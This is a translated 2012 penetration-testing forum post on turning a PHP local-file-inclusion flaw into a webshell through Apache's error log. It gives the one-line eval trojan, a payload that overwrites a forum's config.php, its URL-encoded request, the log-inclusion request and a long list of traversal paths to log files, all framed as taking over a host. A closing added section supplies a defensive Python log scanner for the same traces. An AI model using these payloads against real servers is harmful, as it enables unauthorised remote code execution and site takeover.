中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title: Writing a webshell by including the Apache log from PHP
Author: admin
Date: 2012-9-15 14:27
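The approach above is not very practical: in my tests I found that the logs easily run to tens of megabytes, which makes it pointless to work with. Taking the idea a step further, we write a genuinely usable webshell instead, which is also far better than the painfully slow method above.

For example, take the same one-line trojan again: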
<?eval($_POST[cmd]);?>
By now you have probably realised that this is a pretty good approach. Next, the question is how to write it. Use this:

fopen opens the file /home/virtual/www.xxx.com/forum/config.php and then writes the one-line trojan server-side statement <?eval($_POST[cmd]);?> into it. Put together as a PHP statement, this is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?> // writes the one-line trojan statement into config.php
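We submit this statement so that Apache records it in the error log, then include the log, and the shell is written successfully. Remember that it must be converted to URL-encoded form for this to work.

Converted, it becomes: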
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E

We submit:
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

The error log now contains this line of code that writes the webshell.

Now we include the log by submitting:
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

The webshell has now been written successfully: config.php contains the one-line trojan statement.

OK.

http://www.xxx.com/forum/config.php
is now our webshell.

Connect directly with lanker's client and the host is yours.

PS: Everything above presupposes that the directory is writable; it must be -rwxrwxrwx (777) to proceed. Here, check this directly using the directory listing shown above. Everything described above is exploitation in the case where the log path is known.

For other log paths, you can guess, or refer to the list here.

../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
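
Both steps described in this post leave traces a defender can search for in the web-server log: the request whose URL carries PHP code, and the later request whose parameter points at a log file. The following Python scanner is an added example, not part of the original post; the sample log lines, the regular expressions and the finding labels are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (trimmed); addresses are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [15/Sep/2012:14:20:01 +0800] "GET /forum/index.php HTTP/1.1" 200 5120
198.51.100.7 - - [15/Sep/2012:14:21:09 +0800] "GET /%3C%3F%24fp%3Dfopen%28%22x%22%29%3B%3F%3E HTTP/1.1" 404 209
198.51.100.7 - - [15/Sep/2012:14:22:30 +0800] "GET /z.php?zizzy=../../../../var/log/httpd/error_log HTTP/1.1" 200 48211
203.0.113.9 - - [15/Sep/2012:14:23:02 +0800] "GET /search.php?q=error+log+rotation HTTP/1.1" 200 901
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (.+?) HTTP/[\d.]+"')
# "<?" followed by something that starts PHP code, not e.g. an XML prolog.
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=|\s*\$|\s*[a-z_]+\s*\()", re.I)
# Parameter value that ends in an Apache-style log file name.
LOG_FILE_RE = re.compile(r"(?:acces{1,2}|error)[._]log(?:\.\d+)?$", re.I)

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is also normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the list of findings for one log line (empty if clean)."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    raw_target = match.group(1)
    findings = []
    if PHP_TAG_RE.search(fully_decode(raw_target)):
        findings.append("php-code-in-request")
    for name, value in parse_qsl(urlsplit(raw_target).query, keep_blank_values=True):
        if LOG_FILE_RE.search(fully_decode(value)):
            findings.append(f"log-file-in-param:{name}")
    return findings

def scan(log_text):
    """Map 1-based line numbers to findings, skipping clean lines."""
    results = ((n, classify(l)) for n, l in enumerate(log_text.splitlines(), 1))
    return {n: found for n, found in results if found}

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG).items():
        print(number, found)
```

A hit on the first rule followed by a hit on the second from the same client is the sequence the post describes; either hit alone is worth reviewing together with any recently modified files under the web root.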